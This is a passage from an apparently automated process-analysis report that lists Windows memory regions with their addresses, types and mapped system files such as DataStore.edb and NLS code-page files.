start_va = 0x2473a100000 end_va = 0x2473a106fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a100000" filename = "" Region: id = 1410 start_va = 0x2473a110000 end_va = 0x2473a1effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1411 start_va = 0x2473a1f0000 end_va = 0x2473a1f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 1412 start_va = 0x2473a200000 end_va = 0x2473a2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a200000" filename = "" Region: id = 1413 start_va = 0x2473a300000 end_va = 0x2473a3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a300000" filename = "" Region: id = 1414 start_va = 0x2473a400000 end_va = 0x2473a4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a400000" filename = "" Region: id = 1415 start_va = 0x2473a500000 end_va = 0x2473a50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a500000" filename = "" Region: id = 1416 start_va = 0x2473a510000 end_va = 0x2473a513fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a510000" filename = "" Region: id = 1417 start_va = 0x2473a520000 end_va = 0x2473a520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a520000" filename = "" Region: id = 1418 start_va = 0x2473a530000 end_va = 0x2473a530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473a530000" filename = "" Region: id = 1419 start_va = 0x2473a540000 end_va = 0x2473a543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a540000" filename = "" Region: id = 1420 start_va = 0x2473a550000 end_va = 0x2473a55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a550000" filename = "" Region: id = 1421 start_va = 0x2473a560000 end_va = 0x2473a566fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a560000" filename = "" Region: id = 1422 start_va = 0x2473a570000 end_va = 0x2473a5b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a570000" filename = "" Region: id = 1423 start_va = 0x2473a5c0000 end_va = 0x2473a5c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a5c0000" filename = "" Region: id = 1424 start_va = 0x2473a5d0000 end_va = 0x2473a5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a5d0000" filename = "" Region: id = 1425 start_va = 0x2473a5e0000 end_va = 0x2473a5e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a5e0000" filename = "" Region: id = 1426 start_va = 0x2473a5f0000 end_va = 0x2473a5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a5f0000" filename = "" Region: id = 1427 start_va = 0x2473a600000 end_va = 0x2473a610fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_874.nls" filename = "\\Windows\\System32\\C_874.NLS" (normalized: "c:\\windows\\system32\\c_874.nls") Region: id = 1428 start_va = 0x2473a620000 end_va = 0x2473a620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a620000" filename = "" Region: id = 1429 start_va = 0x2473a630000 end_va = 0x2473a657fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 1430 start_va = 0x2473a660000 end_va = 0x2473a690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_949.nls" filename = "\\Windows\\System32\\C_949.NLS" (normalized: "c:\\windows\\system32\\c_949.nls") Region: id = 1431 start_va = 0x2473a6a0000 end_va = 0x2473a6b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1258.nls" filename = "\\Windows\\System32\\C_1258.NLS" (normalized: "c:\\windows\\system32\\c_1258.nls") Region: id = 1432 start_va = 0x2473a6c0000 end_va = 0x2473a6f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_936.nls" filename = "\\Windows\\System32\\C_936.NLS" (normalized: "c:\\windows\\system32\\c_936.nls") Region: id = 1433 start_va = 0x2473a700000 end_va = 0x2473a730fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_950.nls" filename = "\\Windows\\System32\\C_950.NLS" (normalized: "c:\\windows\\system32\\c_950.nls") Region: id = 1434 start_va = 0x2473a740000 end_va = 0x2473a743fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a740000" filename = "" Region: id = 1435 start_va = 0x2473a750000 end_va = 0x2473a751fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a750000" filename = "" Region: id = 1436 start_va = 0x2473a760000 end_va = 0x2473a760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a760000" filename = "" Region: id = 1437 start_va = 0x2473a770000 end_va = 0x2473a7a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui") Region: id = 1438 start_va = 0x2473a7b0000 end_va = 0x2473a8affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473a7b0000" filename = "" Region: id = 1439 start_va = 0x2473a8b0000 end_va = 0x2473a8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a8b0000" filename = "" Region: id = 1440 start_va = 0x2473a8d0000 end_va = 0x2473a8d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a8d0000" filename = "" Region: id = 1441 start_va = 0x2473a8e0000 end_va = 0x2473a8e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a8e0000" filename = "" Region: id = 1442 start_va = 0x2473a8f0000 end_va = 0x2473a8fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1443 start_va = 0x2473a900000 end_va = 0x2473a9fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473a900000" filename = "" Region: id = 1444 start_va = 0x2473aa00000 end_va = 0x2473aafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473aa00000" filename = "" Region: id = 1445 start_va = 0x2473ab00000 end_va = 0x2473ab0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473ab00000" filename = "" Region: id = 1446 start_va = 0x2473ab10000 end_va = 0x2473ab1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473ab10000" filename = "" Region: id = 1447 start_va = 0x2473ab20000 end_va = 0x2473ab2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473ab20000" filename = "" Region: id = 1448 start_va = 0x2473ab30000 end_va = 0x2473ab3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473ab30000" filename = "" Region: id = 1449 start_va = 0x2473ab40000 end_va = 0x2473ab4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473ab40000" filename = "" Region: id = 1450 start_va = 0x2473ab50000 end_va = 0x2473ab5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473ab50000" filename = "" Region: id = 1451 start_va = 0x2473ab60000 end_va = 0x2473ab6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1452 start_va = 0x2473ab70000 end_va = 0x2473ab7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1453 start_va = 0x2473ab80000 end_va = 0x2473ab8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1454 start_va = 0x2473ab90000 end_va = 0x2473ab96fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473ab90000" filename = "" Region: id = 1455 start_va = 0x2473aba0000 end_va = 0x2473abaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1456 start_va = 0x2473abb0000 end_va = 0x2473abbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1457 start_va = 0x2473abc0000 end_va = 0x2473abcffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1458 start_va = 0x2473abd0000 end_va = 0x2473abdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1459 start_va = 0x2473abe0000 end_va = 0x2473abe6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473abe0000" filename = "" Region: id = 1460 start_va = 0x2473abf0000 end_va = 0x2473abfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1461 start_va = 0x2473ac00000 end_va = 0x2473acfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473ac00000" filename = "" Region: id = 1462 start_va = 0x2473ad00000 end_va = 0x2473adfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473ad00000" filename = "" Region: id = 1463 start_va = 0x2473ae00000 end_va = 0x2473aefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473ae00000" filename = "" Region: id = 1464 start_va = 0x2473af00000 end_va = 0x2473affffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473af00000" filename = "" Region: id = 1465 start_va = 0x2473b000000 end_va = 0x2473b0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473b000000" filename = "" Region: id = 1466 start_va = 0x2473b100000 end_va = 0x2473b1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473b100000" filename = "" Region: id = 1467 start_va = 0x2473b200000 end_va = 0x2473b2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473b200000" filename = "" Region: id = 1468 start_va = 0x2473b300000 end_va = 0x2473b3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473b300000" filename = "" Region: id = 1469 start_va = 0x2473b400000 end_va = 0x2473b4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473b400000" filename = "" Region: id = 1470 start_va = 0x2473b500000 end_va = 0x2473b5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473b500000" filename = "" Region: id = 1471 start_va = 0x2473b600000 end_va = 0x2473b64dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473b600000" filename = "" Region: id = 1472 start_va = 0x2473b650000 end_va = 0x2473b69dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473b650000" filename = "" Region: id = 1473 start_va = 0x2473b6a0000 end_va = 0x2473b6affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473b6a0000" filename = "" Region: id = 1474 start_va = 0x2473b6b0000 end_va = 0x2473b6bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473b6b0000" filename = "" Region: id = 1475 start_va = 0x2473b6c0000 end_va = 0x2473b6cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473b6c0000" filename = "" Region: id = 1476 start_va = 0x2473b6d0000 end_va = 0x2473b6dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473b6d0000" filename = "" Region: id = 1477 start_va = 0x2473b6e0000 end_va = 0x2473b6effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473b6e0000" filename = "" Region: id = 1478 start_va = 0x2473b6f0000 end_va = 0x2473b6fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002473b6f0000" filename = "" Region: id = 1479 start_va = 0x2473b700000 end_va = 0x2473c6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473b700000" filename = "" Region: id = 1480 start_va = 0x2473c700000 end_va = 0x2473c70ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1481 start_va = 0x2473c710000 end_va = 0x2473c71ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1482 start_va = 0x2473c720000 end_va = 0x2473c72ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1483 start_va = 0x2473c730000 end_va = 0x2473c73ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1484 start_va = 0x2473c740000 end_va = 0x2473c74ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1485 start_va = 0x2473c750000 end_va = 0x2473c75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473c750000" filename = "" Region: id = 1486 start_va = 0x2473c760000 end_va = 0x2473c76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473c760000" filename = "" Region: id = 1487 start_va = 0x2473c770000 end_va = 0x2473c773fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473c770000" filename = "" Region: id = 1488 start_va = 0x2473c780000 end_va = 0x2473c78ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1489 start_va = 0x2473c790000 end_va = 0x2473c79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473c790000" filename = "" Region: id = 1490 start_va = 0x2473c7a0000 end_va = 0x2473c7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473c7a0000" filename = "" Region: id = 1491 start_va = 0x2473c7b0000 end_va = 0x2473c7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473c7b0000" filename = "" Region: id = 1492 start_va = 0x2473c7c0000 end_va = 0x2473c7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473c7c0000" filename = "" Region: id = 1493 start_va = 0x2473c7d0000 end_va = 0x2473c7d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 1494 start_va = 0x2473c7e0000 end_va = 0x2473c7e3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 1495 start_va = 0x2473c7f0000 end_va = 0x2473c7f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473c7f0000" filename = "" Region: id = 1496 start_va = 0x2473c800000 end_va = 0x2473c80ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1497 start_va = 0x2473c810000 end_va = 0x2473c81ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1498 start_va = 0x2473c820000 end_va = 0x2473c82ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1499 start_va = 0x2473c830000 end_va = 0x2473c83ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1500 start_va = 0x2473c840000 end_va = 0x2473c84ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1501 start_va = 0x2473c850000 end_va = 0x2473c85ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1502 start_va = 0x2473c860000 end_va = 0x2473c86ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1503 start_va = 0x2473c870000 end_va = 0x2473c87ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1504 start_va = 0x2473c880000 end_va = 0x2473c88ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1505 start_va = 0x2473c890000 end_va = 0x2473c89ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1506 start_va = 0x2473c8a0000 end_va = 0x2473c8affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1507 start_va = 0x2473c8b0000 end_va = 0x2473c8bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1508 start_va = 0x2473c8c0000 end_va = 0x2473c8cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1509 start_va = 0x2473c8d0000 end_va = 0x2473c8dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1510 start_va = 0x2473c8e0000 end_va = 0x2473c8effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1511 start_va = 0x2473c8f0000 end_va = 0x2473c8fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1512 start_va = 0x2473c900000 end_va = 0x2473c90ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1513 start_va = 0x2473c910000 end_va = 0x2473c91ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1514 start_va = 0x2473c920000 end_va = 0x2473c92ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1515 start_va = 0x2473c930000 end_va = 0x2473c93ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1516 start_va = 0x2473c940000 end_va = 0x2473c94ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1517 start_va = 0x2473c950000 end_va = 0x2473c95ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1518 start_va = 0x2473c960000 end_va = 0x2473c966fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473c960000" filename = "" Region: id = 1519 start_va = 0x2473c970000 end_va = 0x2473c97ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1520 start_va = 0x2473c980000 end_va = 0x2473c98ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1521 start_va = 0x2473c990000 end_va = 0x2473c99ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1522 start_va = 0x2473c9a0000 end_va = 0x2473c9affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1523 start_va = 0x2473c9b0000 end_va = 0x2473c9bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1524 start_va = 0x2473c9c0000 end_va = 0x2473c9cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1525 start_va = 0x2473c9d0000 end_va = 0x2473c9dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1526 start_va = 0x2473c9e0000 end_va = 0x2473c9effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1527 start_va = 0x2473c9f0000 end_va = 0x2473c9fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1528 start_va = 0x2473ca00000 end_va = 0x2473cafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473ca00000" filename = "" Region: id = 1529 start_va = 0x2473cb00000 end_va = 0x2473cbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473cb00000" filename = "" Region: id = 1530 start_va = 0x2473cc00000 end_va = 0x2473ccfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473cc00000" filename = "" Region: id = 1531 start_va = 0x2473cd00000 end_va = 0x2473cdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002473cd00000" filename = "" Region: id = 1532 start_va = 0x2473ce00000 end_va = 0x2473ce0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1533 start_va = 0x2473ce10000 end_va = 0x2473ce1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1534 start_va = 0x2473ce20000 end_va = 0x2473ce2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1535 start_va = 0x2473ce30000 end_va = 0x2473ce3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1536 start_va = 0x2473ce40000 end_va = 0x2473ce4ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1537 start_va = 0x2473ce50000 end_va = 0x2473ce5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1538 start_va = 0x2473ce60000 end_va = 0x2473ce6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1539 start_va = 0x2473ce70000 end_va = 0x2473ce7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1540 start_va = 0x2473ce80000 end_va = 0x2473ce8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1541 start_va = 0x2473ce90000 end_va = 0x2473ce9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1542 start_va = 0x2473cea0000 end_va = 0x2473ceaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1543 start_va = 0x2473ceb0000 end_va = 0x2473cebffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = 